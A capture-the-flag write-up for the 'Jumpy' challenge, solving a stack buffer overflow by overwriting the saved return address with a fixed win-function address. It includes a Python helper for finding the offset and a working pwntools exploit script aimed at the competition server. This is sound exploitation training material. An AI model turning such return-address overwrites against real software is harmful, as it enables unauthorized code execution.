200 WCSCCTF Jumpy



Description of Challenge

This challenge had two parts: the first was overflowing the fixed-size stack buffer, and the second was overwriting the saved return address with the address of the win function (winrar). ASLR was off and we are given the binary, so the address can be hard-coded. Note that the binary is also not position-independent (0x400636 sits in the default 0x400000 text mapping of a non-PIE x86-64 ELF), so the win address would be fixed even with ASLR on; ASLR only matters for stack and library addresses, which this exploit never needs.

24 bytes of filler reach the saved return address, so we send 24 'a's followed by the 8-byte little-endian win address.
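How the offset of 24 is found in practice, and what to check before sending the payload, as an added example that is not part of the original writeup and does not use pwntools. It generates a cyclic (De Bruijn) pattern, models the overflow of a frame whose saved return address sits 24 bytes past the start of the buffer (a stand-in for reading the 8 bytes at $rsp when the `ret` faults under gdb; the 24 is the value the writeup reports, assumed here), looks the crash value up in the pattern to recover the offset, and builds the same `filler + p64(win)` payload while rejecting any 0x0a byte, which gets()/sendline would truncate on. The win address is the writeup's 0x400636; everything else is constructed for the example.

```python
import struct

WIN_ADDRESS = 0x400636   # address of the win function, taken from the writeup
BUF_TO_RET = 24          # assumed frame layout: bytes from buffer start to saved RIP


def cyclic(length, alphabet=b"abcdefghijklmnopqrstuvwxyz", n=4):
    """First `length` bytes of the De Bruijn sequence B(26, 4): every 4-byte
    window is unique, so a value found in a register or on the stack after a
    crash identifies its offset in the input. Same output as pwntools' cyclic()."""
    k = len(alphabet)
    a = [0] * k * n
    seq = []

    class _Done(Exception):
        pass

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
                if len(seq) >= length:
                    raise _Done
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    try:
        db(1, 1)
    except _Done:
        pass
    return bytes(alphabet[i] for i in seq[:length])


def cyclic_find(pattern, value):
    """Offset of `value` (4 or more bytes, as read from the crash) in `pattern`, or -1."""
    return pattern.find(value)


def simulated_crash(data, buf_to_ret=BUF_TO_RET):
    """Toy model of gets() writing `data` over a frame whose saved return address
    starts `buf_to_ret` bytes into the buffer. Returns the 8 bytes that land in
    the saved-RIP slot as an integer. On the real target you read this value
    from the 8 bytes at $rsp when `ret` faults (a non-canonical address is
    never loaded into RIP, so $rip still points at the ret instruction)."""
    frame = bytearray(buf_to_ret + 8)          # constructed frame: buffer ... saved RIP
    frame[:len(data)] = data[:len(frame)]      # unbounded copy, truncated to what we model
    return int.from_bytes(frame[buf_to_ret:buf_to_ret + 8], "little")


def find_offset(pattern_len=64):
    """Send a cyclic pattern, take the clobbered saved RIP, look it up."""
    pattern = cyclic(pattern_len)
    rip = simulated_crash(pattern)
    # only the low 4 bytes are needed for a unique match in a B(26, 4) pattern
    return cyclic_find(pattern, struct.pack("<Q", rip)[:4])


def build_payload(offset, win_address=WIN_ADDRESS):
    """filler + little-endian 8-byte win address, i.e. the writeup's 'a'*24 + p64(win).
    Rejects 0x0a anywhere in the payload: gets() stops at a newline and
    sendline() appends one, so a 0x0a inside the address would cut the write short."""
    payload = b"a" * offset + struct.pack("<Q", win_address)
    if b"\n" in payload:
        raise ValueError("payload contains 0x0a; gets()/sendline() would truncate it")
    return payload


if __name__ == "__main__":
    off = find_offset()
    print("offset to saved return address:", off)
    print("payload:", build_payload(off).hex())
```

The same lookup works with pwntools' own `cyclic()`/`cyclic_find()`; the point of doing it by hand is to see why 24 falls out and why the address bytes have to be checked before they go down the wire.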

Exploit

from pwn import *
import time
context(arch='amd64', os='linux')
context.log_level = 'debug'
binary      = ELF('jumpy')
competition = True

if competition:
    conn = remote("wcscctf.org", 8484)
else:
    conn = remote('localhost', 1234)

def getInput():
    # consume the prompt the binary prints before reading our input
    print(conn.recvline())

def sendPayload():
    # no ASLR, and the binary is not PIE, so the win address is fixed
    winAddress = p64(0x400636)
    filler   =   b'a'*24          # 24 bytes of filler reach the saved return address
    payload  =   filler + winAddress
    # save the payload so it can be replayed under gdb (run < payload)
    # to confirm the saved return address is overwritten
    with open('payload', 'wb') as f:
        f.write(payload)
    conn.sendline(payload)
    time.sleep(1)
    print(conn.recvline() + conn.recvline())

if __name__ == "__main__":
    getInput()
    sendPayload()